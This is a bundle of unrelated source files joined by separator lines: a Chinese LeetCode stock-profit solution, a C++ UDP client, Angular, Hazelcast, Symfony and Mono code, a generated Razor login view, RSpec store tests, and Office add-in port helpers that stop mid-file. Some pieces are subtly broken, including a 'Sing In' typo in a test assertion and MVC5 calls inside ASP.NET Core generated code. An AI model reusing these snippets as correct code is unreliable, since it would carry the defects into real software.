该解决方案遵循方法二所使用的逻辑,但有一些轻微的变化。在这种情况下,我们可以简单地继续在斜坡上爬升并持续增加从连续交易中获得的利润,而不是在谷之后寻找每个峰值。最后,我们将有效地使用峰值和谷值,但不需要跟踪峰值和谷值对应的成本以及最大利润;我们可以直接继续累加数组中连续数字之间的差值:只要第二个数字大于第一个数字,就把差值计入总和,得到的总和就是最大利润。这种方法简化了解决方案。
这个例子可以更清楚地展现上述情况:
[1, 7, 2, 3, 6, 7, 6, 7]
与此数组对应的图形是:
Profit Graph
https://pic.leetcode-cn.com/6eaf01901108809ca5dfeaef75c9417d6b287c841065525083d1e2aac0ea1de4-file_1555699697692
从上图中,我们可以观察到 A+B+C 的和等于直接差值 D 所对应的连续峰和谷的高度之差。
class Solution {
    // One-pass approach: sum every positive day-to-day price difference;
    // this equals the total of all peak-valley gains.
    public int maxProfit(int[] prices) {
        int maxprofit = 0;
        for (int i = 1; i < prices.length; i++) {
            if (prices[i] > prices[i - 1])
                maxprofit += prices[i] - prices[i - 1];
        }
        return maxprofit;
    }
}
复杂度分析
时间复杂度:O(n),只需遍历一次。
空间复杂度:O(1),只需要常量的空间。
|
/*
* UDP server wrapper class.
*
* @author Michel Megens
* @email [email protected]
*/
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <lwiot.h>
#include <lwiot/types.h>
#include <lwiot/log.h>
#include <lwiot/stl/string.h>
#include <lwiot/error.h>
#include <lwiot/network/stdnet.h>
#include <lwiot/network/udpclient.h>
#include <lwiot/network/socketudpclient.h>
namespace lwiot
{
/* Default-construct an unbound UDP client with no underlying socket. */
SocketUdpClient::SocketUdpClient() : UdpClient(), _socket(nullptr), _noclose(false)
{
}

/*
 * Construct a client for addr:port. When an existing socket @srv is
 * supplied it is borrowed (marked _noclose, so never closed by this
 * object); otherwise a fresh socket is created via init().
 */
SocketUdpClient::SocketUdpClient(const IPAddress &addr, uint16_t port, socket_t* srv) :
    UdpClient(addr, port), _socket(srv)
{
    if(srv == nullptr)
        this->init();
    else
        this->_noclose = true;
}

/* Construct a client for host:port, creating an owned socket. */
SocketUdpClient::SocketUdpClient(const lwiot::String &host, uint16_t port) : UdpClient(host, port)
{
    this->init();
}
/* (Re)start the client: resolve the host, drop any old socket, create a new one. */
void SocketUdpClient::begin()
{
    this->resolve();
    this->close();
    this->init();
}

/* (Re)start against a new host/port. Note: _port is stored in network byte order. */
void SocketUdpClient::begin(const lwiot::String &host, uint16_t port)
{
    this->_host = host;
    this->_port = to_netorders(port);
    this->begin();
}

/* (Re)start against a literal address/port; clears _host so no lookup is done. */
void SocketUdpClient::begin(const lwiot::IPAddress &addr, uint16_t port)
{
    this->_host = "";
    this->_remote = addr;
    this->_port = to_netorders(port);
    this->begin();
}
/*
 * Create the underlying UDP socket for the current remote address.
 * NOTE(review): udp_socket_create() may presumably fail and return null;
 * callers of this class test _socket against nullptr before use — confirm.
 */
void SocketUdpClient::init()
{
    remote_addr_t remote;

    this->address().toRemoteAddress(remote);
    this->_socket = udp_socket_create(&remote);
    this->_noclose = false;
}
/* Destructor releases the socket unless it is borrowed. */
SocketUdpClient::~SocketUdpClient()
{
    this->close();
}

/* Close the socket unless it is borrowed (_noclose) or already gone. */
void SocketUdpClient::close()
{
    if(!this->_noclose && this->_socket != nullptr) {
        socket_close(this->_socket);
        this->_socket = nullptr;
    }
}
/*
 * Set the receive timeout (seconds) on the base class and on the
 * underlying socket.
 *
 * Fix: guard against a null socket. The socket is created lazily (see
 * write()/read(), which call init() on demand), so setTimeout() can
 * legally be invoked before any socket exists; the original passed
 * nullptr straight into socket_set_timeout().
 */
void SocketUdpClient::setTimeout(time_t seconds)
{
    UdpClient::setTimeout(seconds);

    if(this->_socket != nullptr)
        socket_set_timeout(this->_socket, seconds);
}
/*
 * Send @length bytes from @buffer to the configured remote endpoint.
 * Lazily (re)creates the socket when none exists yet.
 * Returns the number of bytes sent, or -EINVALID when no socket could
 * be created.
 */
ssize_t SocketUdpClient::write(const void *buffer, const size_t& length)
{
    if(this->_socket == nullptr) {
        this->resolve();
        this->init();

        if(this->_socket == nullptr)
            return -EINVALID;
    }

    remote_addr_t dest;
    this->address().toRemoteAddress(dest);
    dest.version = this->address().version();
    dest.port = this->port();

    return udp_send_to(this->_socket, buffer, length, &dest);
}
/*
 * Receive up to @length bytes into @buffer. Lazily (re)creates the
 * socket when none exists yet. Returns bytes read or -EINVALID when no
 * socket could be created.
 */
ssize_t SocketUdpClient::read(void *buffer, const size_t& length)
{
    if(this->_socket == nullptr) {
        this->resolve();
        this->init();

        if(this->_socket == nullptr)
            return -EINVALID;
    }

    remote_addr_t from;
    from.version = this->address().version();

    return udp_recv_from(this->_socket, buffer, length, &from);
}
/*
 * Number of bytes waiting in the socket receive buffer.
 * NOTE(review): returning -EINVALID from a size_t (unsigned) function
 * wraps to a huge positive value when no socket exists; callers must
 * treat that as an error sentinel — confirm against the UdpClient API.
 */
size_t SocketUdpClient::available() const
{
    if(this->_socket == nullptr)
        return -EINVALID;

    return udp_socket_available(this->_socket);
}
}
|
import * as angularDevkitSchematics from '@angular-devkit/schematics';
import {
SchematicTestRunner,
UnitTestTree,
} from '@angular-devkit/schematics/testing';
import * as path from 'path';
import { readJsonInTree } from '../../src/utils';
const { Tree } = angularDevkitSchematics;
// Re-export the real schematics module through a mock so that
// `externalSchematic` can be spied on in the tests below while all real
// behavior is preserved via requireActual().
jest.mock(
  '@angular-devkit/schematics',
  () =>
    ({
      __esModule: true,
      ...jest.requireActual('@angular-devkit/schematics'),
      // For some reason TS (BUT only via ts-jest, not in VSCode) has an issue with this spread usage of requireActual(), so suppressing with any
      // eslint-disable-next-line @typescript-eslint/no-explicit-any
    } as any),
);

// Runner that executes schematics from this package's own collection.
const schematicRunner = new SchematicTestRunner(
  '@angular-eslint/schematics',
  path.join(__dirname, '../../src/collection.json'),
);
describe('library', () => {
  let appTree: UnitTestTree;

  // Fresh workspace tree for every test: an empty package.json plus a
  // minimal angular.json with no projects registered yet.
  beforeEach(() => {
    appTree = new UnitTestTree(Tree.empty());
    appTree.create('package.json', JSON.stringify({}));
    appTree.create(
      'angular.json',
      JSON.stringify({
        $schema: './node_modules/@angular/cli/lib/config/schema.json',
        version: 1,
        newProjectRoot: 'projects',
        projects: {},
      }),
    );
  });
  it('should pass all the given options directly to the @schematics/angular schematic', async () => {
    const spy = jest.spyOn(angularDevkitSchematics, 'externalSchematic');
    const options = {
      name: 'bar',
    };
    expect(spy).not.toHaveBeenCalled();
    await schematicRunner
      .runSchematicAsync('library', options, appTree)
      .toPromise();
    // The wrapper schematic should delegate exactly once to the Angular CLI
    // implementation, forwarding the user's options unchanged.
    expect(spy).toHaveBeenCalledTimes(1);
    expect(spy).toHaveBeenCalledWith(
      '@schematics/angular',
      'library',
      expect.objectContaining(options),
    );
  });
  // NOTE(review): this test (and the next) runs the 'application' schematic
  // even though the enclosing describe is 'library' — confirm whether
  // 'library' was intended; the pinned snapshot matches application output.
  it('should change the lint target to use the @angular-eslint builder', async () => {
    const tree = await schematicRunner
      .runSchematicAsync('application', { name: 'bar' }, appTree)
      .toPromise();
    expect(readJsonInTree(tree, 'angular.json').projects.bar.architect.lint)
      .toMatchInlineSnapshot(`
      Object {
        "builder": "@angular-eslint/builder:lint",
        "options": Object {
          "lintFilePatterns": Array [
            "projects/bar/**/*.ts",
            "projects/bar/**/*.html",
          ],
        },
      }
    `);
  });
  // Verifies the generated project-level .eslintrc.json (extends the root
  // config, wires parserOptions to the project tsconfigs, and applies the
  // custom selector prefix) and that no tslint.json is left behind.
  it('should add the ESLint config for the project and delete the TSLint config', async () => {
    const tree = await schematicRunner
      .runSchematicAsync(
        'application',
        { name: 'bar', prefix: 'something-else-custom' },
        appTree,
      )
      .toPromise();
    expect(tree.exists('projects/bar/tslint.json')).toBe(false);
    expect(tree.read('projects/bar/.eslintrc.json')?.toString())
      .toMatchInlineSnapshot(`
      "{
        \\"extends\\": \\"../../.eslintrc.json\\",
        \\"ignorePatterns\\": [
          \\"!**/*\\"
        ],
        \\"overrides\\": [
          {
            \\"files\\": [
              \\"*.ts\\"
            ],
            \\"parserOptions\\": {
              \\"project\\": [
                \\"projects/bar/tsconfig.app.json\\",
                \\"projects/bar/tsconfig.spec.json\\",
                \\"projects/bar/e2e/tsconfig.json\\"
              ],
              \\"createDefaultProgram\\": true
            },
            \\"rules\\": {
              \\"@angular-eslint/directive-selector\\": [
                \\"error\\",
                {
                  \\"type\\": \\"attribute\\",
                  \\"prefix\\": \\"something-else-custom\\",
                  \\"style\\": \\"camelCase\\"
                }
              ],
              \\"@angular-eslint/component-selector\\": [
                \\"error\\",
                {
                  \\"type\\": \\"element\\",
                  \\"prefix\\": \\"something-else-custom\\",
                  \\"style\\": \\"kebab-case\\"
                }
              ]
            }
          },
          {
            \\"files\\": [
              \\"*.html\\"
            ],
            \\"rules\\": {}
          }
        ]
      }
      "
    `);
  });
});
|
//
// System.CodeDom CodeDirectiveCollection class
//
// Authors:
// Marek Safar ([email protected])
// Sebastien Pouliot <[email protected]>
//
// (C) 2004 Ximian, Inc.
// Copyright (C) 2005 Novell, Inc (http://www.novell.com)
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
//
#if NET_2_0
using System.Runtime.InteropServices;
namespace System.CodeDom
{
	[Serializable]
	[ComVisible (true), ClassInterface (ClassInterfaceType.AutoDispatch)]
	public class CodeDirectiveCollection: System.Collections.CollectionBase {

		// Creates an empty collection of CodeDirective objects.
		public CodeDirectiveCollection ()
		{
		}

		// Creates a collection pre-populated with the given array.
		public CodeDirectiveCollection (CodeDirective[] value)
		{
			AddRange (value);
		}

		// Creates a collection pre-populated with another collection's elements.
		public CodeDirectiveCollection (CodeDirectiveCollection value)
		{
			AddRange (value);
		}

		// Indexed access; the inner List stores plain objects, so cast on read.
		public CodeDirective this [int index] {
			get { return (CodeDirective) List [index]; }
			set { List [index] = value; }
		}

		// Appends a directive and returns the index at which it was added.
		public int Add (CodeDirective value)
		{
			return List.Add (value);
		}

		// Appends every element of the array; null array is rejected.
		public void AddRange (CodeDirective[] value)
		{
			if (value == null) {
				throw new ArgumentNullException ("value");
			}
			for (int i = 0; i < value.Length; i++) {
				Add (value[i]);
			}
		}

		// Appends every element of another collection. The count is captured
		// up front so that adding a collection to itself terminates instead
		// of looping as elements are appended.
		public void AddRange (CodeDirectiveCollection value)
		{
			if (value == null) {
				throw new ArgumentNullException ("value");
			}
			int count = value.Count;
			for (int i = 0; i < count; i++) {
				Add (value[i]);
			}
		}

		// True when the directive is present (reference/Equals semantics of List).
		public bool Contains (CodeDirective value)
		{
			return List.Contains (value);
		}

		// Copies the collection into the array starting at the given index.
		public void CopyTo (CodeDirective[] array, int index)
		{
			List.CopyTo (array, index);
		}

		// Index of the directive, or -1 when absent.
		public int IndexOf (CodeDirective value)
		{
			return List.IndexOf (value);
		}

		// Inserts the directive at the given position.
		public void Insert (int index, CodeDirective value)
		{
			List.Insert (index, value);
		}

		// Removes the first occurrence of the directive.
		public void Remove (CodeDirective value)
		{
			List.Remove (value);
		}
	}
}
#endif
|
/*
* Copyright (c) 2008-2020, Hazelcast, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hazelcast.client.impl.protocol.codec;
import com.hazelcast.client.impl.protocol.ClientMessage;
import com.hazelcast.client.impl.protocol.Generated;
import com.hazelcast.client.impl.protocol.codec.builtin.*;
import com.hazelcast.client.impl.protocol.codec.custom.*;
import javax.annotation.Nullable;
import static com.hazelcast.client.impl.protocol.ClientMessage.*;
import static com.hazelcast.client.impl.protocol.codec.builtin.FixedSizeTypesCodec.*;
/*
* This file is auto-generated by the Hazelcast Client Protocol Code Generator.
* To change this file, edit the templates or the protocol
* definitions on the https://github.com/hazelcast/hazelcast-client-protocol
* and regenerate it.
*/
/**
* Checks the lock for the specified key.If the lock is acquired then returns true, else returns false.
*/
@Generated("306071f9db7b2ab1e92edc63a77973c7")
public final class MapIsLockedCodec {
    //hex: 0x011200
    public static final int REQUEST_MESSAGE_TYPE = 70144;
    //hex: 0x011201
    public static final int RESPONSE_MESSAGE_TYPE = 70145;
    private static final int REQUEST_INITIAL_FRAME_SIZE = PARTITION_ID_FIELD_OFFSET + INT_SIZE_IN_BYTES;
    private static final int RESPONSE_RESPONSE_FIELD_OFFSET = RESPONSE_BACKUP_ACKS_FIELD_OFFSET + BYTE_SIZE_IN_BYTES;
    private static final int RESPONSE_INITIAL_FRAME_SIZE = RESPONSE_RESPONSE_FIELD_OFFSET + BOOLEAN_SIZE_IN_BYTES;

    // Static codec holder; never instantiated.
    private MapIsLockedCodec() {
    }

    @edu.umd.cs.findbugs.annotations.SuppressFBWarnings({"URF_UNREAD_PUBLIC_OR_PROTECTED_FIELD"})
    public static class RequestParameters {

        /**
         * name of map
         */
        public java.lang.String name;

        /**
         * Key for the map entry to check if it is locked.
         */
        public com.hazelcast.internal.serialization.Data key;
    }

    /**
     * Encodes a Map.IsLocked request for the given map name and key.
     * The request is marked retryable (the check is read-only).
     */
    public static ClientMessage encodeRequest(java.lang.String name, com.hazelcast.internal.serialization.Data key) {
        ClientMessage clientMessage = ClientMessage.createForEncode();
        clientMessage.setRetryable(true);
        clientMessage.setOperationName("Map.IsLocked");
        ClientMessage.Frame initialFrame = new ClientMessage.Frame(new byte[REQUEST_INITIAL_FRAME_SIZE], UNFRAGMENTED_MESSAGE);
        encodeInt(initialFrame.content, TYPE_FIELD_OFFSET, REQUEST_MESSAGE_TYPE);
        // Partition id is filled in later by the invocation service; -1 = unset.
        encodeInt(initialFrame.content, PARTITION_ID_FIELD_OFFSET, -1);
        clientMessage.add(initialFrame);
        StringCodec.encode(clientMessage, name);
        DataCodec.encode(clientMessage, key);
        return clientMessage;
    }

    /**
     * Decodes a Map.IsLocked request: skips the fixed-size initial frame,
     * then reads the map name and key frames in encoding order.
     */
    public static MapIsLockedCodec.RequestParameters decodeRequest(ClientMessage clientMessage) {
        ClientMessage.ForwardFrameIterator iterator = clientMessage.frameIterator();
        RequestParameters request = new RequestParameters();
        //empty initial frame
        iterator.next();
        request.name = StringCodec.decode(iterator);
        request.key = DataCodec.decode(iterator);
        return request;
    }

    @edu.umd.cs.findbugs.annotations.SuppressFBWarnings({"URF_UNREAD_PUBLIC_OR_PROTECTED_FIELD"})
    public static class ResponseParameters {

        /**
         * Returns true if the entry is locked, otherwise returns false
         */
        public boolean response;
    }

    /**
     * Encodes the boolean lock-status response into a single fixed-size frame.
     */
    public static ClientMessage encodeResponse(boolean response) {
        ClientMessage clientMessage = ClientMessage.createForEncode();
        ClientMessage.Frame initialFrame = new ClientMessage.Frame(new byte[RESPONSE_INITIAL_FRAME_SIZE], UNFRAGMENTED_MESSAGE);
        encodeInt(initialFrame.content, TYPE_FIELD_OFFSET, RESPONSE_MESSAGE_TYPE);
        encodeBoolean(initialFrame.content, RESPONSE_RESPONSE_FIELD_OFFSET, response);
        clientMessage.add(initialFrame);
        return clientMessage;
    }

    /**
     * Decodes the boolean lock-status from the response's initial frame.
     */
    public static MapIsLockedCodec.ResponseParameters decodeResponse(ClientMessage clientMessage) {
        ClientMessage.ForwardFrameIterator iterator = clientMessage.frameIterator();
        ResponseParameters response = new ResponseParameters();
        ClientMessage.Frame initialFrame = iterator.next();
        response.response = decodeBoolean(initialFrame.content, RESPONSE_RESPONSE_FIELD_OFFSET);
        return response;
    }
}
|
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <[email protected]>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Component\Mailer\Transport;
use Psr\Log\LoggerInterface;
use Psr\Log\NullLogger;
use Symfony\Component\Mailer\Envelope;
use Symfony\Component\Mailer\Event\MessageEvent;
use Symfony\Component\Mailer\SentMessage;
use Symfony\Component\Mime\Address;
use Symfony\Component\Mime\RawMessage;
use Symfony\Contracts\EventDispatcher\EventDispatcherInterface;
/**
* @author Fabien Potencier <[email protected]>
*/
abstract class AbstractTransport implements TransportInterface
{
    private $dispatcher;
    private $logger;
    // Maximum messages per second; 0 disables throttling.
    private $rate = 0;
    // microtime() timestamp of the last send; 0 until throttling kicks in.
    private $lastSent = 0;

    public function __construct(EventDispatcherInterface $dispatcher = null, LoggerInterface $logger = null)
    {
        $this->dispatcher = $dispatcher;
        $this->logger = $logger ?? new NullLogger();
    }

    /**
     * Sets the maximum number of messages to send per second (0 to disable).
     */
    public function setMaxPerSecond(float $rate): self
    {
        if (0 >= $rate) {
            $rate = 0;
        }

        $this->rate = $rate;
        $this->lastSent = 0;

        return $this;
    }

    /**
     * Clones the message and envelope, lets listeners rewrite the envelope
     * through a MessageEvent, performs the concrete send, then applies the
     * per-second rate limit.
     */
    public function send(RawMessage $message, Envelope $envelope = null): ?SentMessage
    {
        // Clone so listeners and doSend() cannot mutate the caller's objects.
        $message = clone $message;
        $envelope = null !== $envelope ? clone $envelope : Envelope::create($message);

        if (null !== $this->dispatcher) {
            $event = new MessageEvent($message, $envelope, (string) $this);
            $this->dispatcher->dispatch($event);
            // Listeners may have replaced the envelope (e.g. new recipients).
            $envelope = $event->getEnvelope();
        }

        $message = new SentMessage($message, $envelope);
        $this->doSend($message);
        $this->checkThrottling();

        return $message;
    }

    /**
     * Performs the actual delivery of the message.
     */
    abstract protected function doSend(SentMessage $message): void;

    /**
     * @param Address[] $addresses
     *
     * @return string[]
     */
    protected function stringifyAddresses(array $addresses): array
    {
        return array_map(function (Address $a) {
            return $a->toString();
        }, $addresses);
    }

    protected function getLogger(): LoggerInterface
    {
        return $this->logger;
    }

    /**
     * Sleeps just long enough to keep the send rate at or below $rate
     * messages per second, then records the current send time.
     */
    private function checkThrottling()
    {
        if (0 == $this->rate) {
            return;
        }

        // Remaining fraction of the per-message interval since the last send.
        $sleep = (1 / $this->rate) - (microtime(true) - $this->lastSent);
        if (0 < $sleep) {
            $this->logger->debug(sprintf('Email transport "%s" sleeps for %.2f seconds', __CLASS__, $sleep));
            usleep($sleep * 1000000);
        }
        $this->lastSent = microtime(true);
    }
}
|
#pragma checksum "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml" "{ff1816ec-aa5e-4d10-87f7-6f4963833460}" "6c93321e6e9b0f148e0449c5902bf5cb7ad221b8"
// <auto-generated/>
#pragma warning disable 1591
[assembly: global::Microsoft.AspNetCore.Razor.Hosting.RazorCompiledItemAttribute(typeof(AspNetCore.Views_Shared__LoginPartial), @"mvc.1.0.view", @"/Views/Shared/_LoginPartial.cshtml")]
namespace AspNetCore
{
#line hidden
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.Rendering;
using Microsoft.AspNetCore.Mvc.ViewFeatures;
#nullable restore
#line 1 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\_ViewImports.cshtml"
using KombniyApp;
#line default
#line hidden
#nullable disable
#nullable restore
#line 2 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\_ViewImports.cshtml"
using KombniyApp.Models;
#line default
#line hidden
#nullable disable
#nullable restore
#line 1 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
using Asp.NetCore.Identity;
#line default
#line hidden
#nullable disable
[global::Microsoft.AspNetCore.Razor.Hosting.RazorSourceChecksumAttribute(@"SHA1", @"6c93321e6e9b0f148e0449c5902bf5cb7ad221b8", @"/Views/Shared/_LoginPartial.cshtml")]
[global::Microsoft.AspNetCore.Razor.Hosting.RazorSourceChecksumAttribute(@"SHA1", @"cde0cb099000a1d3912655c1fefd364ef5f3e561", @"/Views/_ViewImports.cshtml")]
// Generated Razor page class for /Views/Shared/_LoginPartial.cshtml: renders
// manage/log-off navigation for authenticated requests and register/login
// links otherwise. Generated code — edit the .cshtml, not this file.
public class Views_Shared__LoginPartial : global::Microsoft.AspNetCore.Mvc.Razor.RazorPage<dynamic>
{
    #pragma warning disable 1998
    public async override global::System.Threading.Tasks.Task ExecuteAsync()
    {
        WriteLiteral("\r\n");
#nullable restore
#line 3 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
if (Request.IsAuthenticated)
{
using (Html.BeginForm("LogOff", "Account", FormMethod.Post, new { id = "logoutForm", @class = "form-inline" }))
{

#line default
#line hidden
#nullable disable
#nullable restore
#line 7 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
Write(Html.AntiForgeryToken());

#line default
#line hidden
#nullable disable
        WriteLiteral(" <li class=\"nav-item\">\r\n ");
#nullable restore
#line 9 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
Write(Html.ActionLink("Hi " + User.Identity.GetUserName() + "!", "Index", "Manage", routeValues: null, htmlAttributes: new { title = "Manage", @class = "nav-link waves-effect waves-light" }));

#line default
#line hidden
#nullable disable
        WriteLiteral("\r\n </li>\r\n <li class=\"nav-item\"><a class=\"nav-link waves-effect waves-light\" href=\"javascript:document.getElementById(\'logoutForm\').submit()\">Cerrar sesión</a></li>\r\n");
#nullable restore
#line 12 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
}
}
else
{

#line default
#line hidden
#nullable disable
        WriteLiteral(" <li class=\"nav-item\">");
#nullable restore
#line 16 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
Write(Html.ActionLink("Register", "Register", "Account", routeValues: null, htmlAttributes: new { id = "registerLink", @class = "nav-link waves-effect waves-light" }));

#line default
#line hidden
#nullable disable
        WriteLiteral("</li>\r\n <li class=\"nav-item\">");
#nullable restore
#line 17 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
Write(Html.ActionLink("Login", "Login", "Account", routeValues: null, htmlAttributes: new { id = "loginLink", @class = "nav-link waves-effect waves-light" }));

#line default
#line hidden
#nullable disable
        WriteLiteral("</li>\r\n");
#nullable restore
#line 18 "C:\Users\merve bilgiç\Documents\GitHub\KombniyApp\KombniyApp\Views\Shared\_LoginPartial.cshtml"
}

#line default
#line hidden
#nullable disable
    }
    #pragma warning restore 1998
    // Framework-injected view services (populated by the Razor runtime).
    [global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
    public global::Microsoft.AspNetCore.Mvc.ViewFeatures.IModelExpressionProvider ModelExpressionProvider { get; private set; }
    [global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
    public global::Microsoft.AspNetCore.Mvc.IUrlHelper Url { get; private set; }
    [global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
    public global::Microsoft.AspNetCore.Mvc.IViewComponentHelper Component { get; private set; }
    [global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
    public global::Microsoft.AspNetCore.Mvc.Rendering.IJsonHelper Json { get; private set; }
    [global::Microsoft.AspNetCore.Mvc.Razor.Internal.RazorInjectAttribute]
    public global::Microsoft.AspNetCore.Mvc.Rendering.IHtmlHelper<dynamic> Html { get; private set; }
}
#pragma warning restore 1591
|
# Capybara feature coverage for the storefront page.
describe 'Feature Test: Store', :type => :feature do

  describe "Category List" do
    it "displays all of the categories as links" do
      visit store_path
      Category.all.each do |category|
        expect(page).to have_link(category.title, href: category_path(category))
      end
    end
  end

  describe "Item List" do
    it 'displays all items that have inventory' do
      # Zero out one item's stock so we can assert it is hidden from the page.
      second_item = Item.second
      second_item.inventory = 0
      second_item.save
      visit store_path
      Item.all.each do |item|
        if item == second_item
          expect(page).to_not have_content item.title
        else
          expect(page).to have_content item.title
          expect(page).to have_content "$#{item.price.to_f}"
        end
      end
    end

    context "not logged in" do
      it 'does not display "Add To Cart" button' do
        visit store_path
        expect(page).to_not have_content "Add To Cart"
      end
    end

    context "logged in" do
      before(:each) do
        @user = User.first
        login_as(@user, scope: :user)
      end

      it 'does display "Add To Cart" button' do
        visit store_path
        expect(page).to have_selector("input[type=submit][value='Add to Cart']")
      end
    end
  end
describe 'Headers' do
context "not logged in" do
it 'has a sign in link' do
visit store_path
expect(page).to have_link("Sign In")
end
it 'has a sign up link' do
visit store_path
expect(page).to have_link("Sign Up")
end
end
context "logged in" do
before(:each) do
@user = User.first
login_as(@user, scope: :user)
end
it "tells the user who they are signed in as" do
visit store_path
expect(page).to have_content("Signed in as #{@user.email}")
end
it "has a sign out link" do
visit store_path
expect(page).to have_link("Sign Out")
end
it "lets users sign out" do
visit store_path
click_link("Sign Out")
expect(page.current_path).to eq(store_path)
expect(page).to have_link("Sing In")
end
end
it 'has a Store Home Link' do
visit store_path
expect(page).to have_link("Store Home")
end
it 'does not have a Cart link' do
visit store_path
expect(page).to_not have_link("Cart")
end
end
end
|
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT license.
// TypeScript-emitted async/await helper: drives the generator produced from
// an async function, resolving the returned promise when it completes.
var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {
    function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); }
    return new (P || (P = Promise))(function (resolve, reject) {
        function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }
        function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } }
        function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); }
        step((generator = generator.apply(thisArg, _arguments || [])).next());
    });
};
Object.defineProperty(exports, "__esModule", { value: true });
const childProcess = require("child_process");
const crypto = require("crypto");
const net = require("net");
const office_addin_usage_data_1 = require("office-addin-usage-data");
/**
 * Determines whether a port is in use.
 * @param port port number (0 - 65535)
 * @returns true if port is in use; false otherwise.
 */
function isPortInUse(port) {
    validatePort(port);
    return new Promise((resolve) => {
        const probe = net.createServer();
        probe.once("error", () => {
            // Bind failed — something already owns the port.
            resolve(true);
        });
        probe.once("listening", () => {
            // Bind succeeded — the port is free; release it immediately.
            probe.close();
            resolve(false);
        });
        probe.listen(port);
    });
}
exports.isPortInUse = isPortInUse;
/**
 * Parse the port from a string which ends with colon and a number.
 * @param text string to parse
 * @example "127.0.0.1:3000" returns 3000
 * @example "[::1]:1900" returns 1900
 * @example "Local Address" returns undefined
 */
function parsePort(text) {
    const match = /:(\d+)$/.exec(text);
    if (!match) {
        return undefined;
    }
    return Number.parseInt(match[1], 10);
}
/**
 * Return the process ids using the port.
 * @param port port number (0 - 65535)
 * @returns Promise to array containing process ids, or empty if none.
 */
function getProcessIdsForPort(port) {
    validatePort(port);
    return new Promise((resolve, reject) => {
        const isWin32 = process.platform === "win32";
        // Windows: list all connections and filter below; elsewhere ask lsof
        // for the port directly.
        const command = isWin32 ? `netstat -ano` : `lsof -n -i:${port}`;
        childProcess.exec(command, (error, stdout) => {
            if (error) {
                if (error.code === 1) {
                    // no processes are using the port
                    resolve([]);
                }
                else {
                    reject(error);
                }
            }
            else {
                // Set dedupes pids that appear on multiple lines.
                const processIds = new Set();
                const lines = stdout.trim().split("\n");
                if (isWin32) {
                    lines.forEach((line) => {
                        // netstat columns: proto, local addr, foreign addr, state, pid.
                        const [protocol, localAddress, foreignAddress, status, processId] = line.split(" ").filter((text) => text);
                        if (processId !== undefined) {
                            const localAddressPort = parsePort(localAddress);
                            if (localAddressPort === port) {
                                processIds.add(parseInt(processId, 10));
                            }
                        }
                    });
                }
                else {
                    lines.forEach((line) => {
                        // lsof columns; skip the "PID" header row.
                        const [process, processId, user, fd, type, device, size, node, name] = line.split(" ").filter((text) => text);
                        if ((processId !== undefined) && (processId !== "PID")) {
                            processIds.add(parseInt(processId, 10));
                        }
                    });
                }
                resolve(Array.from(processIds));
            }
        });
    });
}
exports.getProcessIdsForPort = getProcessIdsForPort;
/**
 * Returns a random port number which is not in use.
 * @returns Promise to number from 0 to 65535
 */
function randomPortNotInUse() {
    return __awaiter(this, void 0, void 0, function* () {
        let port;
        // Rejection-sample: keep drawing random ports until a free one is found.
        do {
            port = randomPortNumber();
        } while (yield isPortInUse(port));
        return port;
    });
}
exports.randomPortNotInUse = randomPortNotInUse;
/**
 * Returns a random number between 0 and 65535
 */
